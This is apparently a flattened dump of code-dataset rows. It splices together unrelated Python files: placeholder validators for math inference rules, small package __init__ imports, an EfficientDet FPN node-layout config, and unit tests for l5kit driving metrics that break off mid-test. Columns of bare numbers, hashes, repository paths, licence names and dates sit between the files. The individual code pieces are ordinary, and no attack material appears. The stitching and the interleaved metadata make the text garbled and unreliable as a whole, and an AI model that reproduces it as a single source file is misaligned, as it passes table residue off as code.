    >>> separate_vector_into_two_trigonometric_ratios(latex_dict)
    'no check performed'
    """
    logger.info("[trace]")
    return "no check performed"
def maximum_of_expr(latex_dict: dict) -> str:
    """
    Placeholder for the 'maximum of expression' inference rule.

    Validation is not implemented yet (TODO), so this always returns
    'no check performed'.

    >>> latex_dict = {}
    >>> latex_dict['input'] = [{'LHS': parse_latex(''), 'RHS': parse_latex('')}]
    >>> latex_dict['feed'] = [parse_latex('')]
    >>> latex_dict['output'] = [{'LHS': parse_latex(''), 'RHS': parse_latex('')}]
    >>> maximum_of_expr(latex_dict)
    'no check performed'
    """
    logger.info("[trace]")
    return "no check performed"
def evaluate_definite_integral(latex_dict: dict) -> str:
    """
    Placeholder for the 'evaluate definite integral' inference rule.

    Validation is not implemented yet (TODO), so this always returns
    'no check performed'.

    >>> latex_dict = {}
    >>> latex_dict['input'] = [{'LHS': parse_latex(''), 'RHS': parse_latex('')}]
    >>> latex_dict['feed'] = [parse_latex('')]
    >>> latex_dict['output'] = [{'LHS': parse_latex(''), 'RHS': parse_latex('')}]
    >>> evaluate_definite_integral(latex_dict)
    'no check performed'
    """
    logger.info("[trace]")
    return "no check performed"
def expr_is_true_under_condition_expr(latex_dict: dict) -> str:
    """
    Claim that an expression is true under a stated condition expression.

    Validation is not implemented yet (TODO), so this always returns
    'no check performed'.

    >>> latex_dict = {}
    >>> latex_dict['input'] = [{'LHS': parse_latex(''), 'RHS': parse_latex('')}]
    >>> latex_dict['feed'] = [parse_latex('')]
    >>> latex_dict['output'] = [{'LHS': parse_latex(''), 'RHS': parse_latex('')}]
    >>> expr_is_true_under_condition_expr(latex_dict)
    'no check performed'
    """
    logger.info("[trace]")
    return "no check performed"
def declare_variable_replacement(latex_dict: dict) -> str:
    """
    Declare a replacement of one variable by another.

    Validation is not implemented yet (TODO), so this always returns
    'no check performed'.

    >>> latex_dict = {}
    >>> latex_dict['input'] = [{'LHS': parse_latex(''), 'RHS': parse_latex('')}]
    >>> latex_dict['feed'] = [parse_latex('')]
    >>> latex_dict['output'] = [{'LHS': parse_latex(''), 'RHS': parse_latex('')}]
    >>> declare_variable_replacement(latex_dict)
    'no check performed'
    """
    logger.info("[trace]")
    return "no check performed"
def integrate(latex_dict: dict) -> str:
    """
    Placeholder for the 'integrate' inference rule.

    Validation is not implemented yet (TODO), so this always returns
    'no check performed'.

    >>> latex_dict = {}
    >>> latex_dict['input'] = [{'LHS': parse_latex(''), 'RHS': parse_latex('')}]
    >>> latex_dict['feed'] = [parse_latex('')]
    >>> latex_dict['output'] = [{'LHS': parse_latex(''), 'RHS': parse_latex('')}]
    >>> integrate(latex_dict)
    'no check performed'
    """
    logger.info("[trace]")
    return "no check performed"
def replace_constant_with_value(latex_dict: dict) -> str:
    """Validation stub for the 'replace constant with value' inference rule.

    No check is implemented yet; the step is accepted as unverified.
    `latex_dict` carries 'input'/'feed'/'output' lists of parsed expressions
    (presumably sympy's parse_latex — confirm); it is currently ignored.

    >>> latex_dict = {}
    >>> latex_dict['input'] = [{'LHS': parse_latex(''), 'RHS': parse_latex('')}]
    >>> latex_dict['feed'] = [parse_latex('')]
    >>> latex_dict['output'] = [{'LHS': parse_latex(''), 'RHS': parse_latex('')}]
    >>> replace_constant_with_value(latex_dict)
    'no check performed'
    """
    logger.info("[trace]")
    return "no check performed"
def expand_LHS(latex_dict: dict) -> str:
    """Validation stub for the 'expand left-hand side' inference rule.

    No check is implemented yet; the step is accepted as unverified.
    `latex_dict` carries 'input'/'feed'/'output' lists of parsed expressions
    (presumably sympy's parse_latex — confirm); it is currently ignored.

    >>> latex_dict = {}
    >>> latex_dict['input'] = [{'LHS': parse_latex(''), 'RHS': parse_latex('')}]
    >>> latex_dict['feed'] = [parse_latex('')]
    >>> latex_dict['output'] = [{'LHS': parse_latex(''), 'RHS': parse_latex('')}]
    >>> expand_LHS(latex_dict)
    'no check performed'
    """
    logger.info("[trace]")
    return "no check performed"
def expand_RHS(latex_dict: dict) -> str:
    """Validation stub for the 'expand right-hand side' inference rule.

    No check is implemented yet; the step is accepted as unverified.
    `latex_dict` carries 'input'/'feed'/'output' lists of parsed expressions
    (presumably sympy's parse_latex — confirm); it is currently ignored.

    >>> latex_dict = {}
    >>> latex_dict['input'] = [{'LHS': parse_latex(''), 'RHS': parse_latex('')}]
    >>> latex_dict['feed'] = [parse_latex('')]
    >>> latex_dict['output'] = [{'LHS': parse_latex(''), 'RHS': parse_latex('')}]
    >>> expand_RHS(latex_dict)
    'no check performed'
    """
    logger.info("[trace]")
    return "no check performed"
def multiply_expr_by_expr(latex_dict: dict) -> str:
    """Validation stub for the 'multiply expression by expression' rule.

    No check is implemented yet; the step is accepted as unverified.
    `latex_dict` carries 'input'/'feed'/'output' lists of parsed expressions
    (presumably sympy's parse_latex — confirm); it is currently ignored.

    >>> latex_dict = {}
    >>> latex_dict['input'] = [{'LHS': parse_latex(''), 'RHS': parse_latex('')}]
    >>> latex_dict['feed'] = [parse_latex('')]
    >>> latex_dict['output'] = [{'LHS': parse_latex(''), 'RHS': parse_latex('')}]
    >>> multiply_expr_by_expr(latex_dict)
    'no check performed'
    """
    logger.info("[trace]")
    return "no check performed"
def apply_operator_to_bra(latex_dict: dict) -> str:
    """Validation stub for the 'apply operator to bra' inference rule.

    Intended transformation (not yet checked):
    given
        x = \\langle\\psi_{\\alpha}| \\hat{A} |\\psi_{\\beta}\\rangle
    return
        x = \\langle\\psi_{\\alpha}| a_{\\alpha} |\\psi_{\\beta} \\rangle

    No check is implemented yet; the step is accepted as unverified.

    >>> latex_dict = {}
    >>> latex_dict['input'] = [{'LHS': parse_latex(''), 'RHS': parse_latex('')}]
    >>> latex_dict['feed'] = [parse_latex('')]
    >>> latex_dict['output'] = [{'LHS': parse_latex(''), 'RHS': parse_latex('')}]
    >>> apply_operator_to_bra(latex_dict)
    'no check performed'
    """
    logger.info("[trace]")
    return "no check performed"
def apply_operator_to_ket(latex_dict: dict) -> str:
    """Validation stub for the 'apply operator to ket' inference rule.

    Intended transformation (not yet checked):
    given
        x = \\langle\\psi_{\\alpha}| \\hat{A} |\\psi_{\\beta}\\rangle
    return
        x = \\langle\\psi_{\\alpha}| a_{\\beta} |\\psi_{\\beta} \\rangle

    No check is implemented yet; the step is accepted as unverified.

    >>> latex_dict = {}
    >>> latex_dict['input'] = [{'LHS': parse_latex(''), 'RHS': parse_latex('')}]
    >>> latex_dict['feed'] = [parse_latex('')]
    >>> latex_dict['output'] = [{'LHS': parse_latex(''), 'RHS': parse_latex('')}]
    >>> apply_operator_to_ket(latex_dict)
    'no check performed'
    """
    logger.info("[trace]")
    return "no check performed"
def drop_nondominant_term(latex_dict: dict) -> str:
    """Validation stub for the 'drop non-dominant term' inference rule.

    No check is implemented yet; the step is accepted as unverified.
    (The original docstring carried a bra-ket example copy-pasted from
    apply_operator_to_ket that did not describe this rule; removed.)

    >>> latex_dict = {}
    >>> latex_dict['input'] = [{'LHS': parse_latex(''), 'RHS': parse_latex('')}]
    >>> latex_dict['feed'] = [parse_latex('')]
    >>> latex_dict['output'] = [{'LHS': parse_latex(''), 'RHS': parse_latex('')}]
    >>> drop_nondominant_term(latex_dict)
    'no check performed'
    """
    logger.info("[trace]")
    return "no check performed"
def apply_gradient_to_scalar_function(latex_dict: dict) -> str:
    """Validation stub for the 'apply gradient to scalar function' rule.

    No check is implemented yet; the step is accepted as unverified.
    (The original docstring carried a bra-ket example copy-pasted from
    apply_operator_to_ket that did not describe this rule; removed.)

    >>> latex_dict = {}
    >>> latex_dict['input'] = [{'LHS': parse_latex(''), 'RHS': parse_latex('')}]
    >>> latex_dict['feed'] = [parse_latex('')]
    >>> latex_dict['output'] = [{'LHS': parse_latex(''), 'RHS': parse_latex('')}]
    >>> apply_gradient_to_scalar_function(latex_dict)
    'no check performed'
    """
    logger.info("[trace]")
    return "no check performed"
# EOF
| 36.614918
| 113
| 0.574262
| 10,161
| 78,539
| 4.180002
| 0.036217
| 0.172698
| 0.079815
| 0.060179
| 0.92753
| 0.905658
| 0.882749
| 0.857321
| 0.794834
| 0.742778
| 0
| 0.016689
| 0.22408
| 78,539
| 2,144
| 114
| 36.631996
| 0.680276
| 0.382052
| 0
| 0.640562
| 0
| 0
| 0.205101
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.084337
| false
| 0
| 0.008032
| 0
| 0.291165
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
453f204ef00500daea83df67d629e9b1c4706eba
| 138
|
py
|
Python
|
molsysmt/tools/biopython_SeqRecord/__init__.py
|
dprada/molsysmt
|
83f150bfe3cfa7603566a0ed4aed79d9b0c97f5d
|
[
"MIT"
] | null | null | null |
molsysmt/tools/biopython_SeqRecord/__init__.py
|
dprada/molsysmt
|
83f150bfe3cfa7603566a0ed4aed79d9b0c97f5d
|
[
"MIT"
] | null | null | null |
molsysmt/tools/biopython_SeqRecord/__init__.py
|
dprada/molsysmt
|
83f150bfe3cfa7603566a0ed4aed79d9b0c97f5d
|
[
"MIT"
] | null | null | null |
from .is_biopython_SeqRecord import is_biopython_SeqRecord
from .to_file_fasta import to_file_fasta
from .to_file_pir import to_file_pir
| 27.6
| 58
| 0.884058
| 24
| 138
| 4.583333
| 0.375
| 0.218182
| 0.363636
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.094203
| 138
| 4
| 59
| 34.5
| 0.88
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
|
0
| 6
|
18bbb8cbabaf75d00fa6d0360b98da822a485d70
| 23
|
py
|
Python
|
discordscript/__init__.py
|
jcb1317/DiscordScript
|
3642057d0482dee205de2d46908d33816dfe947f
|
[
"MIT"
] | null | null | null |
discordscript/__init__.py
|
jcb1317/DiscordScript
|
3642057d0482dee205de2d46908d33816dfe947f
|
[
"MIT"
] | null | null | null |
discordscript/__init__.py
|
jcb1317/DiscordScript
|
3642057d0482dee205de2d46908d33816dfe947f
|
[
"MIT"
] | null | null | null |
from .api import Client
| 23
| 23
| 0.826087
| 4
| 23
| 4.75
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.130435
| 23
| 1
| 23
| 23
| 0.95
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
18c2102b0b4f9a8e69a96c1673f20c5ed3c84575
| 21
|
py
|
Python
|
Window/__init__.py
|
Wevel/SilkscreenMasker
|
87c4bcfd18679c1f6c18252016fab2091dc37c05
|
[
"MIT"
] | null | null | null |
Window/__init__.py
|
Wevel/SilkscreenMasker
|
87c4bcfd18679c1f6c18252016fab2091dc37c05
|
[
"MIT"
] | 1
|
2021-06-08T21:07:25.000Z
|
2021-06-08T21:07:25.000Z
|
Window/__init__.py
|
Wevel/SilkscreenMasker
|
87c4bcfd18679c1f6c18252016fab2091dc37c05
|
[
"MIT"
] | null | null | null |
from .dialog import *
| 21
| 21
| 0.761905
| 3
| 21
| 5.333333
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.142857
| 21
| 1
| 21
| 21
| 0.888889
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
18fc6dc165fbb75b01e842c17ca498e16ab9f183
| 24
|
py
|
Python
|
rascil/workflows/shared/__init__.py
|
SKA-ScienceDataProcessor/rascil
|
bd3b47f779e18e184781e2928ad1539d1fdc1c9b
|
[
"Apache-2.0"
] | 7
|
2019-12-14T13:42:33.000Z
|
2022-01-28T03:31:45.000Z
|
rascil/workflows/shared/__init__.py
|
SKA-ScienceDataProcessor/rascil
|
bd3b47f779e18e184781e2928ad1539d1fdc1c9b
|
[
"Apache-2.0"
] | 6
|
2020-01-08T09:40:08.000Z
|
2020-06-11T14:56:13.000Z
|
rascil/workflows/shared/__init__.py
|
SKA-ScienceDataProcessor/rascil
|
bd3b47f779e18e184781e2928ad1539d1fdc1c9b
|
[
"Apache-2.0"
] | 3
|
2020-01-14T11:14:16.000Z
|
2020-09-15T05:21:06.000Z
|
from .imaging import *
| 8
| 22
| 0.708333
| 3
| 24
| 5.666667
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.208333
| 24
| 2
| 23
| 12
| 0.894737
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
e12ed18923632a713fb478fe97ebc75f1e370124
| 6,802
|
py
|
Python
|
src/detection_efffdet/effdet/config/fpn_config.py
|
yellowdolphin/SIIM-COVID19-Detection
|
31e8653b467ac35a8b1d92330ad5f15a12622676
|
[
"MIT"
] | 1,386
|
2020-03-27T07:05:36.000Z
|
2022-03-31T17:27:50.000Z
|
effdet/config/fpn_config.py
|
dmatos2012/efficientdet-pytorch
|
301487e859fa8160dd3e01b7dbc54d713b392676
|
[
"Apache-2.0"
] | 176
|
2020-03-27T07:07:36.000Z
|
2022-03-15T19:49:53.000Z
|
effdet/config/fpn_config.py
|
dmatos2012/efficientdet-pytorch
|
301487e859fa8160dd3e01b7dbc54d713b392676
|
[
"Apache-2.0"
] | 276
|
2020-03-28T10:16:24.000Z
|
2022-03-30T19:27:12.000Z
|
import itertools
from omegaconf import OmegaConf
def bifpn_config(min_level, max_level, weight_method=None):
    """Build the BiFPN node layout for pyramid levels [min_level, max_level].

    Each entry of the returned config's ``nodes`` list records the feature
    reduction (2**level), the offsets of the nodes it fuses, and the
    weighting method used to fuse them.

    Adapted from https://github.com/google/automl/blob/56815c9986ffd4b508fe1d68508e268d129715c1/efficientdet/keras/fpn_configs.py
    """
    cfg = OmegaConf.create()
    fuse = weight_method or 'fastattn'
    n_levels = max_level - min_level + 1
    # node ids registered so far at each pyramid level; the first n_levels
    # ids are the backbone inputs themselves
    ids_at = {min_level + off: [off] for off in range(n_levels)}
    fresh_id = itertools.count(n_levels)

    def last_id(lvl):
        return ids_at[lvl][-1]

    cfg.nodes = []
    # top-down pass
    for lvl in range(max_level - 1, min_level - 1, -1):
        cfg.nodes.append({
            'reduction': 1 << lvl,
            'inputs_offsets': [last_id(lvl), last_id(lvl + 1)],
            'weight_method': fuse,
        })
        ids_at[lvl].append(next(fresh_id))
    # bottom-up pass
    for lvl in range(min_level + 1, max_level + 1):
        cfg.nodes.append({
            'reduction': 1 << lvl,
            'inputs_offsets': list(ids_at[lvl]) + [last_id(lvl - 1)],
            'weight_method': fuse,
        })
        ids_at[lvl].append(next(fresh_id))
    return cfg
def panfpn_config(min_level, max_level, weight_method=None):
    """Build the PAN FPN node layout for pyramid levels [min_level, max_level].

    Defines the layout from Path Aggregation Networks as an alternative to
    BiFPN; it does not implement the full PAN spec.
    Paper: https://arxiv.org/abs/1803.01534
    """
    cfg = OmegaConf.create()
    fuse = weight_method or 'fastattn'
    n_levels = max_level - min_level + 1
    ids_at = {min_level + off: [off] for off in range(n_levels)}
    fresh_id = itertools.count(n_levels)

    def last_id(lvl):
        return ids_at[lvl][-1]

    cfg.nodes = []
    # top-down pass; the topmost level has no higher neighbour to fuse with
    for lvl in range(max_level, min_level - 1, -1):
        if lvl == max_level:
            srcs = [last_id(lvl)]
        else:
            srcs = [last_id(lvl), last_id(lvl + 1)]
        cfg.nodes.append({
            'reduction': 1 << lvl,
            'inputs_offsets': srcs,
            'weight_method': fuse,
        })
        ids_at[lvl].append(next(fresh_id))
    # bottom-up pass; the bottommost level has no lower neighbour
    for lvl in range(min_level, max_level + 1):
        if lvl == min_level:
            srcs = [last_id(lvl)]
        else:
            srcs = [last_id(lvl), last_id(lvl - 1)]
        cfg.nodes.append({
            'reduction': 1 << lvl,
            'inputs_offsets': srcs,
            'weight_method': fuse,
        })
        ids_at[lvl].append(next(fresh_id))
    return cfg
def qufpn_config(min_level, max_level, weight_method=None):
    """A dynamic quad fpn config that can adapt to different min/max levels.
    It extends the idea of BiFPN, and has four paths:
    (up_down -> bottom_up) + (bottom_up -> up_down).
    Paper: https://ieeexplore.ieee.org/document/9225379
    Ref code: From contribution to TF EfficientDet
    https://github.com/google/automl/blob/eb74c6739382e9444817d2ad97c4582dbe9a9020/efficientdet/keras/fpn_configs.py

    Bookkeeping: node_ids[level] is the list of node indices produced so far
    at that pyramid level; the first num_levels ids are the backbone inputs.
    Some levels deliberately append a *duplicate* of their last id so the
    four paths index node_ids[i][0..4] consistently in the final quad-add.
    """
    p = OmegaConf.create()
    weight_method = weight_method or 'fastattn'
    # fusion method used only by the final quad-add nodes
    quad_method = 'fastattn'
    num_levels = max_level - min_level + 1
    node_ids = {min_level + i: [i] for i in range(num_levels)}
    level_last_id = lambda level: node_ids[level][-1]
    level_all_ids = lambda level: node_ids[level]
    level_first_id = lambda level: node_ids[level][0]
    id_cnt = itertools.count(num_levels)
    p.nodes = []
    for i in range(max_level - 1, min_level - 1, -1):
        # top-down path 1.
        p.nodes.append({
            'reduction': 1 << i,
            'inputs_offsets': [level_last_id(i), level_last_id(i + 1)],
            'weight_method': weight_method
        })
        node_ids[i].append(next(id_cnt))
    # duplicate the top level's last id so path 2 sees an entry for max_level
    node_ids[max_level].append(node_ids[max_level][-1])
    for i in range(min_level + 1, max_level):
        # bottom-up path 2.
        p.nodes.append({
            'reduction': 1 << i,
            'inputs_offsets': level_all_ids(i) + [level_last_id(i - 1)],
            'weight_method': weight_method
        })
        node_ids[i].append(next(id_cnt))
    # close path 2 at the top level using its first (backbone) id
    i = max_level
    p.nodes.append({
        'reduction': 1 << i,
        'inputs_offsets': [level_first_id(i)] + [level_last_id(i - 1)],
        'weight_method': weight_method
    })
    node_ids[i].append(next(id_cnt))
    node_ids[min_level].append(node_ids[min_level][-1])
    for i in range(min_level + 1, max_level + 1, 1):
        # bottom-up path 3.
        p.nodes.append({
            'reduction': 1 << i,
            'inputs_offsets': [
                level_first_id(i), level_last_id(i - 1) if i != min_level + 1 else level_first_id(i - 1)],
            'weight_method': weight_method
        })
        node_ids[i].append(next(id_cnt))
    node_ids[min_level].append(node_ids[min_level][-1])
    for i in range(max_level - 1, min_level, -1):
        # top-down path 4.
        p.nodes.append({
            'reduction': 1 << i,
            'inputs_offsets': [node_ids[i][0]] + [node_ids[i][-1]] + [level_last_id(i + 1)],
            'weight_method': weight_method
        })
        node_ids[i].append(next(id_cnt))
    # close path 4 at the bottom level
    i = min_level
    p.nodes.append({
        'reduction': 1 << i,
        'inputs_offsets': [node_ids[i][0]] + [level_last_id(i + 1)],
        'weight_method': weight_method
    })
    node_ids[i].append(next(id_cnt))
    node_ids[max_level].append(node_ids[max_level][-1])
    # NOTE: the order of the quad path is reversed from the original, my code expects the output of
    # each FPN repeat to be same as input from backbone, in order of increasing reductions
    for i in range(min_level, max_level + 1):
        # quad-add path: fuse the outputs of the two path pairs per level
        p.nodes.append({
            'reduction': 1 << i,
            'inputs_offsets': [node_ids[i][2], node_ids[i][4]],
            'weight_method': quad_method
        })
        node_ids[i].append(next(id_cnt))
    return p
def get_fpn_config(fpn_name, min_level=3, max_level=7):
    """Look up an FPN node-layout config by name.

    Args:
        fpn_name: one of 'bifpn_sum', 'bifpn_attn', 'bifpn_fa', 'pan_sum',
            'pan_fa', 'qufpn_sum', 'qufpn_fa'; any falsy value defaults to
            'bifpn_fa'.
        min_level: lowest pyramid level (inclusive).
        max_level: highest pyramid level (inclusive).

    Returns:
        The OmegaConf layout config for the requested variant.

    Raises:
        KeyError: if ``fpn_name`` is not a known variant (same as before).
    """
    if not fpn_name:
        fpn_name = 'bifpn_fa'
    # Map each name to (builder, weight_method) and build only the requested
    # config — the original built all seven configs eagerly on every call.
    name_to_factory = {
        'bifpn_sum': (bifpn_config, 'sum'),
        'bifpn_attn': (bifpn_config, 'attn'),
        'bifpn_fa': (bifpn_config, 'fastattn'),
        'pan_sum': (panfpn_config, 'sum'),
        'pan_fa': (panfpn_config, 'fastattn'),
        'qufpn_sum': (qufpn_config, 'sum'),
        'qufpn_fa': (qufpn_config, 'fastattn'),
    }
    builder, weight_method = name_to_factory[fpn_name]
    return builder(min_level=min_level, max_level=max_level, weight_method=weight_method)
| 36.767568
| 129
| 0.625551
| 987
| 6,802
| 4.037487
| 0.136778
| 0.080301
| 0.061982
| 0.048181
| 0.766123
| 0.766123
| 0.740778
| 0.736512
| 0.707905
| 0.695107
| 0
| 0.026526
| 0.246251
| 6,802
| 184
| 130
| 36.967391
| 0.750731
| 0.151867
| 0
| 0.723077
| 0
| 0
| 0.093113
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.030769
| false
| 0
| 0.015385
| 0
| 0.076923
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
e132e88837b42b1102faffe61afb2e9719625a5e
| 42
|
py
|
Python
|
libs/networks/__init__.py
|
Kinpzz/RCRNet-Pytorch
|
8d9f0fe0c7ad651db7578b2d96741de11036ef82
|
[
"MIT"
] | 67
|
2019-11-22T14:50:09.000Z
|
2021-12-21T21:57:55.000Z
|
libs/networks/__init__.py
|
Kinpzz/RCRNet-Pytorch
|
8d9f0fe0c7ad651db7578b2d96741de11036ef82
|
[
"MIT"
] | 6
|
2019-12-03T14:03:57.000Z
|
2021-10-10T11:25:30.000Z
|
libs/networks/__init__.py
|
Kinpzz/RCRNet-Pytorch
|
8d9f0fe0c7ad651db7578b2d96741de11036ef82
|
[
"MIT"
] | 15
|
2019-10-24T08:14:50.000Z
|
2021-09-24T05:56:16.000Z
|
from .models import ImageModel, VideoModel
| 42
| 42
| 0.857143
| 5
| 42
| 7.2
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.095238
| 42
| 1
| 42
| 42
| 0.947368
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
e139c1756154bed198885e34ceef206678fb8c1e
| 12,141
|
py
|
Python
|
l5kit/l5kit/tests/cle/test_metrics.py
|
Aspirisha/l5kit
|
40ed7576f803e83fc3f0714e6458635f9f6bfe60
|
[
"Apache-2.0"
] | null | null | null |
l5kit/l5kit/tests/cle/test_metrics.py
|
Aspirisha/l5kit
|
40ed7576f803e83fc3f0714e6458635f9f6bfe60
|
[
"Apache-2.0"
] | null | null | null |
l5kit/l5kit/tests/cle/test_metrics.py
|
Aspirisha/l5kit
|
40ed7576f803e83fc3f0714e6458635f9f6bfe60
|
[
"Apache-2.0"
] | 1
|
2021-07-20T15:23:16.000Z
|
2021-07-20T15:23:16.000Z
|
import unittest
from typing import Any
from unittest import mock
import torch
from l5kit.cle import metrics
from l5kit.evaluation import error_functions
from l5kit.evaluation import metrics as l5metrics
class TestCollisionMetric(unittest.TestCase):
    """Checks that collision metrics expose the expected name and type."""

    @staticmethod
    def create_dummy_metric(dummy_metric_name: str = "dummy_metric") -> Any:
        """Build a throwaway CollisionMetricBase subclass instance (FRONT)."""
        class _Dummy(metrics.CollisionMetricBase):
            metric_name = dummy_metric_name

            def __init__(self) -> None:
                super().__init__(l5metrics.CollisionType.FRONT)

        return _Dummy()

    def test_attributes(self) -> None:
        name = "dummy_metric"
        dummy = self.create_dummy_metric(name)
        self.assertEqual(dummy.collision_type, l5metrics.CollisionType.FRONT)
        self.assertEqual(dummy.metric_name, name)

    def test_collision_types(self) -> None:
        # each concrete metric must report the collision type it stands for
        pairs = [
            (l5metrics.CollisionType.FRONT, metrics.CollisionFrontMetric()),
            (l5metrics.CollisionType.SIDE, metrics.CollisionSideMetric()),
            (l5metrics.CollisionType.REAR, metrics.CollisionRearMetric()),
        ]
        for expected_type, metric in pairs:
            self.assertEqual(metric.collision_type, expected_type)
class TestDisplacementErrorMetric(unittest.TestCase):
    """Tests for metrics.DisplacementErrorMetric: per-timestep error between
    the simulated and the recorded ego trajectory."""

    def test_same_trajectory(self) -> None:
        # identical trajectories -> zero error at every timestep
        timesteps = 20
        attrs = {
            "simulated_ego_states": torch.ones(timesteps, 7),
            "recorded_ego_states": torch.ones(timesteps, 7),
        }
        sim_output = mock.Mock(**attrs)
        metric = metrics.DisplacementErrorMetric(error_functions.l2_error)
        result = metric.compute(sim_output)
        self.assertEqual(len(result), timesteps)
        self.assertEqual(result.sum(), 0.)

    def test_parallel_trajectory(self) -> None:
        # constant unit offset -> the same error everywhere;
        # 1.4142 ~ sqrt(2), presumably l2 over the 2D position — confirm
        attrs = {
            "simulated_ego_states": torch.ones(20, 7),
            "recorded_ego_states": torch.full((20, 7), 2.0),
        }
        sim_output = mock.Mock(**attrs)
        metric = metrics.DisplacementErrorMetric(error_functions.l2_error)
        result = metric.compute(sim_output)
        self.assertEqual(len(torch.unique(result)), 1)
        self.assertAlmostEqual(torch.unique(result).item(), 1.4142, 4)

    def test_l2_distance_parallel_trajectory(self) -> None:
        # DisplacementErrorL2Metric must match DisplacementErrorMetric(l2_error)
        attrs = {
            "simulated_ego_states": torch.ones(20, 7),
            "recorded_ego_states": torch.full((20, 7), 2.0),
        }
        sim_output = mock.Mock(**attrs)
        metric_l2_arg = metrics.DisplacementErrorMetric(error_functions.l2_error)
        result_l2_arg = metric_l2_arg.compute(sim_output)
        metric = metrics.DisplacementErrorL2Metric()
        result = metric.compute(sim_output)
        # Make sure both results match
        self.assertTrue((result_l2_arg == result).all())

    def test_half_trajectories(self) -> None:
        # error changes halfway through -> two distinct per-step values
        observed_trajectory = torch.ones(40, 7)
        observed_trajectory[20:, :] += 1.0
        attrs = {
            "simulated_ego_states": torch.ones(40, 7),
            "recorded_ego_states": observed_trajectory,
        }
        sim_output = mock.Mock(**attrs)
        metric = metrics.DisplacementErrorMetric(error_functions.l2_error)
        result = metric.compute(sim_output)
        # This is mainly where displacement diverges from distance to ref traj
        self.assertEqual(len(torch.unique(result)), 2)

    def test_symmetry(self) -> None:
        # swapping simulated and recorded trajectories keeps the total error
        attrs = {
            "simulated_ego_states": torch.ones(20, 7),
            "recorded_ego_states": torch.full((20, 7), 2.0),
        }
        sim_output = mock.Mock(**attrs)
        metric = metrics.DisplacementErrorMetric(error_functions.l2_error)
        result = metric.compute(sim_output)
        attrs = {
            "simulated_ego_states": torch.full((20, 7,), 2.0),
            "recorded_ego_states": torch.ones(20, 7),
        }
        sim_output = mock.Mock(**attrs)
        metric = metrics.DisplacementErrorMetric(error_functions.l2_error)
        result_switch = metric.compute(sim_output)
        self.assertEqual(result.sum(), result_switch.sum())

    def test_more_simulation_than_observation(self) -> None:
        # more simulated than recorded timesteps must raise ValueError
        timesteps = 20
        attrs = {
            "simulated_ego_states": torch.ones(timesteps + 20, 7),
            "recorded_ego_states": torch.ones(timesteps, 7),
        }
        sim_output = mock.Mock(**attrs)
        metric = metrics.DisplacementErrorMetric(error_functions.l2_error)
        with self.assertRaisesRegex(ValueError, "More simulated timesteps than observed"):
            _ = metric.compute(sim_output)
class TestDistanceToRefTrajectory(unittest.TestCase):
    """Tests for metrics.DistanceToRefTrajectoryMetric: distance from the
    simulated ego to the reference trajectory, evaluated over a leading
    fraction of the scene (default appears to be 0.8 — see below)."""

    def test_same_trajectory(self) -> None:
        # identical trajectories -> zero distance
        attrs = {
            "simulated_ego_states": torch.ones(20, 7),
            "recorded_ego_states": torch.ones(20, 7),
        }
        sim_output = mock.Mock(**attrs)
